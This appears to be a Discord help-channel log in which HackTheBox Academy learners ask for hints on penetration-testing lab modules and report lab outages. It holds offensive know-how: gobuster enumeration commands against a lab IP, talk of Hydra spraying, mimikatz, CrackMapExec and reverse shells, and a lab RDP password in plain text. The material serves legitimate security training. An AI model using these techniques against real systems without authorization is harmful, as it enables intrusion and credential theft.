I am still having the same issue with "Windows Attacks and Defense" module for the "Kerberoasting" section, where I can spawn the box but I receive SPNEGO received NTSTATUS: STATUS_TRUSTED_RELATIONSHIP_FAILURE [0xC000018D] from server when attempting to RDP in using the provided credentials.

I was told to wait 10 to 15 minutes for the trust relationships to build, assuming between WS001 and the DC, but even after 30+ minutes I'm still failing to connect.

Can anyone assist?

rustic sage
#

My instance is not starting....from 15 minutes ....it is loading

prime ginkgo
#

anyyone lese facing the same problem?

rustic sage
#

I think this is a global issue

prime ginkgo
#

I though cloudflare services are up now

lavish cedar
prime ginkgo
lavish cedar
#

sorry, pwnbox just spawned.

prime ginkgo
#

yeah pwnbox working fine

lavish cedar
#

Oh, I had issues before.

quasi wave
#

hi so for the Windows Event Logs section of Windows Event Logs and Finding Evil module, question 1, I identified the right log but the executable mentioned in the log doesn't match up with the format the question mentions

#

can someone help me out here?

#

I know the right log and have it narrowed down to the log at the time and event ID mentioned

quasi wave
#

nevermind solved

turbid inlet
#

Hey guys, could anyone please give me a nudge to figure out how I should proceed for the Penetration Tester job path, on the Web Enumeration module? Ive managed to find an admin login page from the robots.txt file, and found the credentials from the source of the page.

I managed to login, but then its just a blank page with a logout button and the string below.

I tried inputting that into the challenge on HTB but it sais its wrong and Im a bit lost.

What Ive done so far is:

$ gobuster dir -u http://83.136.255.235:56721/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
(this one gave me several routes, most of which are 403, but theres a wordpress one which is 301. I havent been taught how to exploit wordpress yet so im not sure if this is the right path to go down on)
$ gobuster dns -d 83.136.255.235 -w /usr/share/seclists/Discovery/DNS/namelist.txt
(this one doesnt give any dns results at all)

Running whatweb on the IP without the port gives me a few 200 results, but I think theyre legit pages I guess.

Ive also curled the target, but that only tells me that its running apache.

What am I missing here?

south blaze
#

Hey guys, please can anyone assist with this? working on pivoting skills assessment lab and I am trying to run ligolo agent on the target host but keep getting this. The host is amd64 arch and the agent is for amd64 arch. How do i fix this error?

fathom pendant
#

@turbid inlet

  1. It helps to know what section you're working on
  2. Are you sure that the string you found isn't the flag?
fathom pendant
turbid inlet
fathom pendant
#

ah sec

turbid inlet
#

Do sections build on each other by the way? So would I need to use knowledge from the previous section (Service Scanning) to solve this one?

fathom pendant
#

also don't share flags

turbid inlet
#

Ok sry, I thought it was enough to put it as a spoiler. Wont do again. However why does it tell me its wrong when I put it in the question at the end of the section?

fathom pendant
#

make sure you didn't copy any additional whitespace characters

#

but looking at the answer and what I deleted; it should be correct

turbid inlet
#

yeap that was it! I must have copied whitespace. ive been banging my head around this for the past hour lol. thanks!

fathom pendant
#

but yeah, don't share flags -- even in spoiler tags. It's a quick way to get beaned, and (at least assuming your pfp is Reggie) your body is not ready for that

turbid inlet
#

hahahaha noted! and yes its reggie xD that gave me a good chuckle

south blaze
tidal rain
#

Hi! I have a question about the “Using CrackMapExec” skill assessment. I’m stuck on question 4: ||I’ve found a KeePass file on the “dev01” machine, but I can’t crack the password even after trying all the passwords I found for the users. Nothing works.
According to the instructions, I’m supposed to find passwords that should let me access a shared folder with “ccache” files. Is that correct, or am I going down the wrong path?||

Do you have any hint or advice to help me move forward at this step? Thanks in advance!

civic inlet
tidal rain
#

Yes, I finally found the password using this module, but when I entered it into the KDBX file, I received an error message. I try download the file again but i still have this error

If this reoccurs, then your database file may be corrupt.``` 
I try with via winrm and the option --get-file of netexec
#

I got it it wasn't the password of the keepass but of one user !

plain bridge
#

I am genuinely so confused. I don't know if im being slow or if the code provided from the skill assessment is wrong. I am doing the Intro to bash scripting module, flow control - Loops. I have tried probably, 6 different types of loops and I get nothing. Then I noticed that the hash(variable named hash) is supposed to be altered by sed(command) but the input that is supposed to get changed by sed, doesn't exist in "hash". idk can someone help point me in the right direction? This is the lates loop I used. for i in {1..28}
do
var=$(printf '%s' "$var" | base64 | tr -d '\n')
done
salt=${#var}

fathom pendant
plain bridge
sly grotto
#

hey did you find the answer?

#

.

#

hey can someone please help me in Android Application Static Analysis > Skills Assessment
|| I use Hermes-Dec, but I don't know how to find the hidden post. I searched for everything in JS code and found nothing. ||

fathom pendant
wide jungle
#

can anyone explain to me the difference between extraSIDs attack and SIDHistory Injection. I have read multiple articles and I still can't wrap my head around it

woven zenith
#

I have doubts on some techniques discuss in the CPTS course module. Right now I'm on "Attacking Active Directory". Although it was explained that in the module that a pentesters should always asked permission properly from the client for any modification on registries, adding users, password resets, and etc.

I know its a taboo to discuss the exam content. But I just want to asked if the techniques like password reset and adding users for you own good to move laterally or vertically is even allowed?

civic fiber
civic inlet
# wide jungle can anyone explain to me the difference between extraSIDs attack and SIDHistory ...

Correct me if I'm wrong but the way that I see these two attacks is the ExtraSIDS attack basically says to kerberos that they are a current member of a high privileged group and lies about user permissions. The SID history attack means that if a user WAS part of a high privileged group in another domain using SID history means that they should still have that privilege in place. Thoughts?

civic inlet
brave field
wide jungle
brave field
jovial walrus
#

footprint hard any hints? stuck at the very beginning

wide jungle
pale island
jovial walrus
#

snmpwalk gives timeout error if I give v2c ..if i give v3 it says No securityName specified

pale island
jovial walrus
pale island
jovial walrus
#

oh i didnt read the output correctly

#

i am so sorry i need some sleep ahh

#

btw nmap showed this is version3 snmp so how is it using community strings

pale island
pale island
jovial walrus
pale island
winter shell
#

Hello ! i have a question on password attacks module on the pass the certificate! its says that ensure that krb5.conf is properly configured. the configuration is different from the last section? if yes any hints? cause i tried putting .local in the default real and realms but no luck so far

civic inlet
jovial walrus
#

how to get rid of these cert errors while interacting with imap/pop3 server over ssl using openssl - footprint hard

#

in prev footprint medium i got cert errors with xfreerdp which I bypassed using /cert-ignore

marble quiver
#

Attacking Common Services - Skills Assessment - Easy
Need a hint where to find a password. I found a username from ||smtp||.

unique karma
#

Hi everyone, I’m not sure if this is the right place to ask, but I’d really appreciate some guidance. I’m trying to understand how do you guys develop own methodology when approaching a new box.

I’ve noticed that I can complete modules and take notes on the tools used (commands, syntax, screenshots, etc.), but when I face a brand-new box, I often get stuck on how to apply those concepts in practice.

For example, when I encounter a business logic challenge, I quickly run out of ideas on what approach to try next. I understand that modules are meant to teach concepts; not spoon-feed solutions; but I still struggle to convert what I learned into a flexible, adaptive methodology.

So my questions are:

  1. How do you personally craft your methodology when facing a new target?
  • Like.. what does your thought process look like before touching any tool?
  1. How do you structure your notes?
  • Do you write things like “If you encounter X challenge, try approach (1), (2), (3)”? – Or do you organize your notes in some other way to help generate ideas when stuck?
fathom pendant
#

your methodology shouldn't generally change; in terms of most things -- Methodology is just how you tackle a problem, not necessarily the TTPs used to get past a hurdle

#

Methodology is a rough thought process you follow

#

Methods are how you actually tackle a specific problem

fiery cosmos
#

i finished the Footprinting module, i wonder if there any good labs that have the same ideas to practice what i learned in that module?

fathom pendant
#

all labs have footprinting to a degree

fiery cosmos
#

Ok. but is there a particular lab that focuses more on the stuff learned in that module?

fathom pendant
#

no; because footprinting for me comes at step 0 of the process - Enumeration

#

boxes will go beyond step 0, consistently, so just having footprinting skills isn't going to be enough to pwn a box

fiery cosmos
#

ok… do you think i should continue the path or should i practice with some boxes first?

fathom pendant
#

continue the path

#

footprinting is just the surface; everything in that module is an assumption that there's no barriers to getting access, like no passwords/anon login

fiery cosmos
#

oh💀

fathom pendant
#

"to test the flashlight, just press the button to turn it on" - footprinting
"If it doesn't turn on you'll need to unscrew the bottom and check the batteries" - exploiting
(Unscrewing doesn't necessarily mean you need to know how a protocol 100%, just knowing what to look for)

winter shell
#

i am currently on the pass the certificate section of password attacks. i am stuck on how to begin with the second question to find the admon flag. any hints?

fathom pendant
winter shell
#

indeed , my apologies

woven zenith
#

I have doubts on some techniques discuss in the CPTS course module. Right now I'm on "Attacking Active Directory". Although it was explained that in the module that a pentesters should always asked permission properly from the client for any modification on registries, adding users, password resets, and etc.

I know its a taboo to discuss the exam content. But I just want to asked if the techniques like password reset and creating users for you own good to move laterally or vertically is even allowed in the exam?

fathom pendant
west arrow
#

Hello guys has anyone done all Wi-Fi modules and has a good structured notes? I would like to see how you structured your notes

round raven
#

Kinda stuck here for a while. Whats going on ?

rich hornet
#

Same here, can't spawn any target and if it spawn, i can't rdp on it 🙁

round raven
#

:3

proper parrot
#

Welp it looks like its happening again

woven zenith
tidal basin
#

Ditto.

round raven
#

Seems like all labs are down.

hidden ledge
#

Could someone give me a little hint for SQL Injection Fundamental skill assessment after first bypass ? I found injectable parameter but I'm a bit stuck on how to exploit it 🙂

vocal schooner
#

of course

#

dm me

#

Can someone could help me for 'File Upload Module' at Type Filter ?

keen crescent
marble quiver
#

Attacking Common Services - Skills Assessment
When I try to Password Spray FTP with Hydra, I get following error:
[ERROR] all children were disabled due too many connection errors

silk lagoon
heady atlas
#

I have a question about the academy

#

Does doing a module give me cubes from doing questions inside it and give me back the cubes i payed after finishing it? or is the total number the number it says before buying

#

like if a module for example give +10 cubes and inside the questions some of them give +1 is that +1 different from the +10 or is it a part of it

proper parrot
#

I'm doing Pass The Certificates from Password attacks. I'm just following what is on the module but on this part. Nothing happens

woven zenith
#

anyone experiencing connection refused on ligolo-ng when pivoting an attack from msfconsole meterpreter payload(windows)? I tried normal shell/reverse_tcp it was coming thru using nc listener. But in if I use multi/handler I am seeing connection refuse in ligolo-ng

turbid inlet
#

~~Hey again guys, I need some help with the section "Nibbles - Privilege Escalation" in the Getting Started module. I got the the point where I append the reverse shell line at the end of the script I unzipped (correct me if im wrong, but the IP I whould put in that line for nc to connect to is my IP, while connected with VPN, right?). I make it executable, start the listener with the correct port on my host machine, and then execute the script. I get the following errors from the script and the connection is never made, so I dont get the reverse shell. Anyone got any words of wisdom?

sudo /home/nibbler/personal/stuff/monitor.sh             
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found

I think it doesnt like this line in the script for some reason, but since the script is provided by htb on the target already idk if it really is the problem:

if [[ ! -z $iopt ]]

Thanks~~

Edit: I restarted the VM and went through the steps again and it was fixed. Idk, maybe there was something I did wrong and a restart fixed it 🤷

#

If its allowed, I can of course give the last line of the script which should be the one to give me the reverse shell

shadow phoenix
#

Hi everyone, I wanted to ask a question regarding the Skills Assessment for the 'HTTP Attacks' module. I've already found the TE.TE vulnerability and I'm trying to perform CRLF injection of SMTP headers, but I'm not getting the admin email to arrive. Could someone please give me a hint?

fathom pendant
fathom pendant
rotund trellis
#

Hello, I am on "AD Enumeration & Attacks - Skills Assessment Part II" on question 8. I have run mimikatz on the SQL server but for some reason the output did not show the plain text password (but did show the account. The password field simply said "null"). I resorted to crackmapexec, which did output the accounts but not sure how I am supposed to decode the hex output.

brazen briar
#

Responder (Very Easy Machine) from starting point 1
Hey there, I have problem with the site that I'm being redirected to. It sends me to unika.htb but seems like it's not working and I'm kinda lost. Error says on the web "Hmm. We’re having trouble finding that site."

Should it work? or should I continue with the given IP address, but idk how if it's redirects me to the not working site

heady atlas
#

below where

hidden ledge
# brazen briar Responder (Very Easy Machine) from starting point 1 Hey there, I have problem wi...

Check how /etc/hosts file works and how useful it is to 'override' DNS. Because unika.htb is not exposed to internet your OS don't know what domain it is so you have to manually add the IP and the domain in the /etc/hosts file

<ip> unika.htb

Now your OS will firstly look at this file and will see the ip address. He now knows how to connect to this ip which is hosted on the HackTheBox network where the web server runs.

rare mirage
#

Hi, good afternoon. I'm doing the competency assessment for the "Hacking WordPress" module and I'm stuck because, from what I understand, when mapping with nmap, the server is hosted on Apache, and I've never dealt with this before and have no idea how to analyze the services. Do I have to find the vhost and analyze the vhost's services, or not? If so, how do I find out which vhost it is? I know I'm probably asking something really silly, but I'm completely lost.Thank you in advance for your help.

nimble valley
#

Hello all. I'm on the web fuzzing : validating findings for the cwes. In the question section, it ask me to find a directroy and a tar.gz file. I have the directory but there is no tar.gz file. Only a txt file that contains a password and a sql backup. What do I miss ?

#

no problem

#

so frustrating to see how slow and not creative I'm for that kind of problem

fathom pendant
nimble valley
#

I'm sure I'm missing something but no idea what

nimble valley
#

I can still show you with some screen shot I guess

#

If it's ok for you guys

#

Yeah that's why I asked

#

but it would be amazing yes

fathom pendant
fathom pendant
#

Also with curl, -I

nimble valley
#

basicaly the question ask to fuzz a URL to get a directory and check for a tar.gz file in it. No trace of such file in the only directory I found

fathom pendant
#

As its asking for content-length, which is in the header

nimble valley
nimble valley
rotund trellis
#

Followup thought to my question, when I run 'sudo crackmapexec smb <SNIP> -lsa', it outputs the hashes. It mentions "The hex string can be decoded to reveal the password <password>". I thought all the crackmapexec output was hashes, not encoding? How do I know what to decode?

fathom pendant
#

It just all depends, but its giving the intended output. ; it should tell you though that its encoded

nimble valley
acoustic forge
#

Did you get this working?

quaint raft
#

Hi! In "Incident Handling Process" module, Skills Assessment's first tasks I'm having troubles with connecting to the target from the pawnbox. I try xfreerdp /v:10.129.119.61 /u:htb-analyst /p:P3n#31337@LOG and I get
[06:50:35:669] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:670] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Need hints for fixing it

quaint raft
woven zenith
fathom pendant
#

ah thought it was a windows issue

#

since yknow, you mentioned a windows payload

#

if you're trying to get a callback to your attack host remember, the payload has to follow a chain

#

A <-> B <-> C
A --B--> C
C !----> A

#

hopefully the diagram is helpful

ruby belfry
#

thank you from 5 months ago this was driving me insane

fathom pendant
#

that's not an error; body[] is the more appropriate fetch protocol, all grabs metadata about the email

proper parrot
#

Hello, I'm currently doing Skill assessment on password attack. Is it okay to make a write up? (with censoring passwords,hashes, flags ofc)

proper parrot
#

I'll make one privately instead for notes

jovial walrus
fathom pendant
fathom pendant
#

@jovial walrus the module is above tier 0, please dont spoil things. But to answer: not all running services are available externally

jovial walrus
fathom pendant
#

You can ask without spoilers or ask for a nudge in dms, like
"Hey I have a foothold on this and found a service, can someone help?"

jovial walrus
brave field
brave field
#

it's some openssl bug with pop3s but I found an alternate way to use openssl with pop3s

fathom pendant
brave field
brave field
#

you'll understand when I'll share it with you